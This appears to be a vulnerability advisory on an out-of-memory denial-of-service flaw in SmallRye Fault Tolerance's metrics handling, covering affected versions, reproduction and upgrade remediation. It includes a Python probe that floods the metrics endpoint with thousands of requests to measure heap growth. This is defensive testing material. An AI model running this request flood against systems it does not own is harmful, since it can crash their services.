Smallrye Fault Tolerance Out-of-Memory Vulnerability in Red Hat Products
Vulnerability
A denial-of-service vulnerability has been identified in the Smallrye Fault Tolerance component, affecting versions 6.3.0 up to but not including 6.4.2 and versions 6.5.0 up to but not including 6.9.0. It is triggered by requests to the application's metrics URI: each request adds a new object to the component's meterMap, and because those entries are never reclaimed the map grows with every scrape until the JVM heap is exhausted. Since the endpoint exists to be polled, routine monitoring (for example a Prometheus scraper) drives the same growth, only more slowly than a deliberate flood of requests.
Impact
Exploitation leads to an out-of-memory condition in the JVM: the application either crashes with an out-of-memory error or degrades as the heap fills and garbage collection dominates. Anyone who can reach the metrics URI can trigger it with plain repeated requests and no special input, so the practical impact is denial of service of the affected application.
Reproduction
To reproduce this vulnerability, send a large number of requests to the metrics URI of an application that uses an affected Smallrye Fault Tolerance version and observe JVM heap usage. Each request generates a new object in the meterMap; the per-request cost is small, so thousands of requests may be needed before the growth is obvious, but used heap after garbage collection keeps rising until an out-of-memory error occurs. A heap histogram taken before and after the requests (for example with jcmd <pid> GC.class_histogram) shows the growing object count.
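A probe for the reproduction step above, written for this page rather than taken from the advisory, SmallRye or Red Hat. It scrapes the metrics endpoint repeatedly and compares the JVM heap gauge before and after. Two things it assumes that the advisory does not state: the endpoint is the Quarkus default path /q/metrics serving Prometheus text exposition, and Micrometer JVM metrics are enabled so that jvm_memory_used_bytes{area="heap",...} appears in the output. The sample responses embedded for the offline dry run are constructed, not captured from a real application.

```python
"""Probe an application for heap growth under repeated metrics scrapes.

Added example, not code from the advisory or the project. Assumptions:
  * metrics live at the Quarkus default /q/metrics (Prometheus text format);
  * Micrometer JVM metrics are enabled, so jvm_memory_used_bytes{area="heap"}
    samples are present in every scrape.
"""
import sys
import urllib.request

METRICS_PATH = "/q/metrics"            # assumed Quarkus default path
HEAP_METRIC = "jvm_memory_used_bytes"  # Micrometer JVM memory gauge

# Constructed sample responses for an offline dry run (not real captures).
SAMPLE_BEFORE = """# HELP jvm_memory_used_bytes The amount of used memory
# TYPE jvm_memory_used_bytes gauge
jvm_memory_used_bytes{area="heap",id="G1 Eden Space",} 5.0E7
jvm_memory_used_bytes{area="heap",id="G1 Old Gen",} 3.0E7
jvm_memory_used_bytes{area="nonheap",id="Metaspace",} 2.0E7
"""
SAMPLE_AFTER = SAMPLE_BEFORE.replace("3.0E7", "9.0E7")  # old gen grew


def parse_heap_used(metrics_text: str) -> int:
    """Sum every jvm_memory_used_bytes sample labelled area="heap", in bytes."""
    total = 0.0
    found = False
    for line in metrics_text.splitlines():
        if not line.startswith(HEAP_METRIC + "{"):
            continue  # comments, other metrics, unlabelled variants
        labels, _, rest = line.partition("}")
        if 'area="heap"' not in labels or not rest.strip():
            continue  # non-heap pools (area="nonheap") are not of interest
        total += float(rest.split()[0])  # value may be followed by a timestamp
        found = True
    if not found:
        raise ValueError(f"no {HEAP_METRIC} heap samples in metrics output")
    return int(total)


def check_metrics_leak(fetch, n_requests: int = 5000, samples: int = 5) -> dict:
    """Scrape n_requests times and compare heap usage before and after.

    `fetch` is any callable returning the metrics body as text, so the same
    logic runs against a live endpoint or canned responses. The minimum of
    several samples on each side damps ordinary allocation noise but does not
    force a GC, so treat a small delta as inconclusive rather than as clean.
    """
    baseline = min(parse_heap_used(fetch()) for _ in range(samples))
    for _ in range(n_requests):
        fetch()  # on affected versions each scrape adds a meterMap entry
    after = min(parse_heap_used(fetch()) for _ in range(samples))
    growth = after - baseline
    return {
        "baseline_bytes": baseline,
        "after_bytes": after,
        "growth_bytes": growth,
        "growth_per_request": growth / n_requests,
    }


def http_fetcher(base_url: str, path: str = METRICS_PATH, timeout: float = 10.0):
    """Return a fetch() closure that GETs base_url + path."""
    url = base_url.rstrip("/") + path

    def fetch() -> str:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8")

    return fetch


def canned_fetcher(before: str, after: str, samples: int):
    """Offline stand-in for http_fetcher: serves `before` for the baseline
    samples and `after` for every later call (constructed data)."""
    calls = [0]

    def fetch() -> str:
        calls[0] += 1
        return before if calls[0] <= samples else after

    return fetch


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # usage: python metrics_leak_probe.py http://localhost:8080 [n_requests]
        fetch = http_fetcher(sys.argv[1])
        n = int(sys.argv[2]) if len(sys.argv) > 2 else 5000
    else:
        fetch = canned_fetcher(SAMPLE_BEFORE, SAMPLE_AFTER, samples=5)
        n = 1000
    for key, value in check_metrics_leak(fetch, n_requests=n).items():
        print(f"{key}: {value}")
```

The heap gauge is a coarse signal: garbage not yet collected inflates the reading, and a single leaked meterMap entry is tiny, so run the probe with a request count in the thousands and confirm a positive result with a class histogram from jcmd before trusting it. Point the probe only at an instance you own, since on an affected version the probe itself is the denial-of-service.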
Remediation
Upgrade to a fixed release: 6.4.2 for deployments on the 6.3.x and 6.4.x line, or 6.9.0 for deployments on 6.5.0 and later; both contain the fix. Until the upgrade is in place, restrict network access to the metrics URI to the monitoring systems that need it. This narrows who can trigger the condition but does not eliminate it, because every legitimate scrape adds an entry too.
